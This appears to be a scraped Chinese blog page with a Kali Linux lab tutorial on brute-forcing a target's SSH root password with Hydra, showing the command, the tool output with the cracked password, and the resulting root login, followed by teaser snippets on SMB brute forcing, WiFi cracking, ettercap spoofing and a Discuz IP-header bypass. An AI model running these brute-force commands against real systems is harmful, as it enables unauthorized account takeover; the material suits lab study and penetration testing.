kali系列之hydrassh密码爆破

夏天一去,又是冬季 夏天一去,又是冬季     2022-11-02     602

关键词:

环境

kali 192.168.137.131

靶机 192.168.137.133

语句

hydra -l root -P /home/chenglee/zidian/wordlist.TXT -t 6 ssh://192.168.137.133

状态

root@kali:/home/chenglee# hydra -l root -P /home/chenglee/zidian/wordlist.TXT -t 6 ssh://192.168.137.133
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-04-12 10:21:01
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 6 tasks per 1 server, overall 6 tasks, 213561 login tries (l:1/p:0), ~213561 tries per task
[DATA] attacking ssh://192.168.137.133:22/
[STATUS] 96.00 tries/min, 96 tries in 00:00h, 0 to do in 01:00h, 213465 active
[22][ssh] host: 192.168.137.133   login: root   password: lizhenghua
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-04-12 10:23:47
root@kali:/home/chenglee# ss
ss           ssh2john     ssh-argv0    ssh-keygen   sshow        ssldump      sslscan      sslstrip     
sselp        ssh-add      ssh-copy-id  ssh-keyscan  ssid         sslh         sslsniff     sslyze       
ssh          ssh-agent    sshd         sshmitm      sslcaudit    sslh-select  sslsplit     ss_spike     
root@kali:/home/chenglee# ssh root@192.168.137.133
root@192.168.137.133\'s password: 
Last login: Thu Apr 12 17:15:19 2018 from 192.168.137.1
[root@localhost ~]# ipaddr
-bash: ipaddr: command not found
[root@localhost ~]# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
    link/ether 00:0c:29:85:c0:fa brd ff:ff:ff:ff:ff:ff
    inet 192.168.137.133/24 brd 192.168.137.255 scope global eth0
    inet6 fe80::20c:29ff:fe85:c0fa/64 scope link 
       valid_lft forever preferred_lft forever

 

web安全第06讲:密码爆破工具hydra(kali)

1.1、windows系统口令远程爆破(smb服务,445端口)命令:hydra-ladministrator-Ppwd.dicsmb://10.211.55.8-vV-f-ensr解析:-l指定用户名,-L指定用户名字典,-p指定密码,-P指定密码字典,-vV显示爆破细节 查看详情

初二dvwa之bruteforce(密码爆破)

...?原理应该就是先抓包,然后伪造一个header,不停的改变密码,然后post上去,找到一个可能的密码。。。教程上介绍了这么一个工具,burpsuite,原理就应该是上面说的,不过里面功能很 查看详情

kali系列之ettercap欺骗

ettercap在局域网中使用欺骗,捕获对象浏览器中的图片。环境攻击方:kalilinux,ip:192.168.137.129目标方ip:192.168.137.130路由器:192.168.137.1条件:同一网段步骤+在终端中启动ettercapettercap-G选择网卡接口扫描活动主机扫描中...列出hosts如下所示... 查看详情

爆破专栏丨springsecurity系列教程之springsecurity的四种权限控制方式

原创:一一哥前言:在前面的章节中,一一哥已经给大家介绍了SpringSecurity的很多功能,在这些众多功能中,我们知道其核心功能其实就是认证+授权。在前面我们分别基于内存模型、基于默认的数据库模型... 查看详情

爆破专栏丨springsecurity系列教程之实现cas单点登录上篇-概述

作者:千锋一一哥前言从本章节开始,一一哥会给各位讲解一个很常见也很重要的知识点,就是单点登录!现在的大型分布式项目,基本都会考虑实现单点登录,而且现在网上也有很多单点登录的实现方案... 查看详情

网络安全wifi密码爆破教程(代码片段)

WiFi密码爆破教程前言一、什么是暴力破解?二、准备破解工具1.VMwarePro16虚拟机安装2.VMware安装KaliLinux3.kali监听无限网卡三、WiFi密码暴力破解1.虚拟机连接USB网卡2.扫描附近WiFi3.查看目标WiFi连接设备4.抓包5.破解前言暴力破解... 查看详情

discuz!x系列http_x_forwarded_for绕过限制进行密码爆破

这个漏洞比较简单。我们看到配置文件来。/include/common.inc.php 第86-94行。if(getenv(‘HTTP_CLIENT_IP‘)&&strcasecmp(getenv(‘HTTP_CLIENT_IP‘),‘unknown‘)){ $onlineip=getenv(‘HTTP_CLIENT_IP‘);}elseif(getenv(‘HTTP_X_ 查看详情

dc-1靶场搭建及渗透实战详细过程(dc靶场系列)(代码片段)

目录一.环境搭建1.准备工具渗透利器kaliDC-1靶场机2.安装过程二.渗透过程1.信息收集①探测目标IP地址②探测目标IP开放端口 ③网页信息收集2.漏洞查找与利用①漏洞查找②漏洞利用3.Getshell①获取普通shell②获取交互shell 3.数据库... 查看详情

ctf干货分享系列——工具资源

参考技术A这里就是我很喜欢的部分了哈哈。但是气不气,就是没时间写。继续挖大坑。以后会放出工具和资源,作为整合帖。也会另开文单独介绍。BurpSuite是用于攻击Web应用程序的集成平台。它包含了很多工具,并为这些工具... 查看详情

burpsuite基本使用之暴力破解

...了简单的请求修改演示,现在我们来使用BurpSuite进行账号密码爆破。0x02这次对漏洞靶场Pikachu进行爆破,这个靶场的第一关便是暴力破解。0x03基于表单的暴力破解浏览器设置好代理,burp开启拦截,输入账号密码,点击登录,burp... 查看详情

使用hydra爆破3389

参考技术A反正Hydra是个暴力破解的神器,这次正好用上那就记录一下kali下自带Hydra,安装过程就不多说了。命令行下输入hydra,效果如下配置好用户名密码然后就点击start就OK了` 查看详情

hydra爆破ssh(代码片段)

目录Centos7开启ssh服务在Kali中生成一个4位数的密码字典 用Hydra爆破靶机centos7的密码Centos7开启ssh服务SSH配置看博客查看ssh服务开启状态:systemctlstatussshd.service开启ssh服务:systemctlstartsshd.service检查一下22端口是否开启:... 查看详情

nsatp-a学习笔记之day2-6hydra爆破(代码片段)

...发现存在ftp,可以进行爆破爆破ftphydraIPftp-l用户名-P密码字典-t线程(默认16)-vVhydraIPftp-l用户名-P密码字典-ens-vV免责声明本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造成的后果上传者概不... 查看详情

kali系统入门-hydra的使用

hydra的简介:hydra是⼀款开源的暴⼒密码破译⼯具,⽀持多种协议密码的破译。可以对多种服务的账号和密码进行爆破,包括数据库、SSH、FTP等服务,在KaliLinux中自带Hydra。帮助命令hydra-h显示帮助文档Examples:hydra-luser-Ppasslist.txtftp:... 查看详情

一个非常简单易懂的wifi密码爆破python脚本(代码片段)

环境准备python2.7凑合的linux差不多的无线网卡pywifi模块弱口令字典清除系统中的任何wifi连接记录(非常重要!!!)首先,这个模块在win下有点鸡肋,作者在调用WLANAPI时没有做好WLAN_SECURITY_ATTRIBUTES的封装,所以推荐在linux下跑,我测试... 查看详情

渗透工具——hydra破解弱密码(代码片段)

Hydra是一个自动化爆破工具,暴力破解弱密码,是一个支持众多协议的爆破工具,kali中以集成。1.对ssh进行爆破hydra-Luser.txt-Ppassword.txtssh://192.168.3.163-s指定端口hydra-Luser.txt-Ppassword.txtssh://192.168.3.163-s77442.将破解密码保存... 查看详情

渗透工具——hydra破解弱密码(代码片段)

Hydra是一个自动化爆破工具,暴力破解弱密码,是一个支持众多协议的爆破工具,kali中以集成。1.对ssh进行爆破hydra-Luser.txt-Ppassword.txtssh://192.168.3.163-s指定端口hydra-Luser.txt-Ppassword.txtssh://192.168.3.163-s77442.将破解密码保存... 查看详情

hydra(九头蛇)工具使用(代码片段)

...用方式2.2.Hydra常用参数2.3.Hydra注意事项2.4.Kail字典2.5.Hydra密码生成器3.Hydra案例3.1.创建账号密码文件3.2.SSH协议爆破3.2.1.靶机信息3.2.2.开始爆破3.2.2.1.不知账号3.2.2.2.知道账号3.3.FTP协议爆破3.4.数据库爆破3.4.1.靶机信息3.4.2.开始爆破3... 查看详情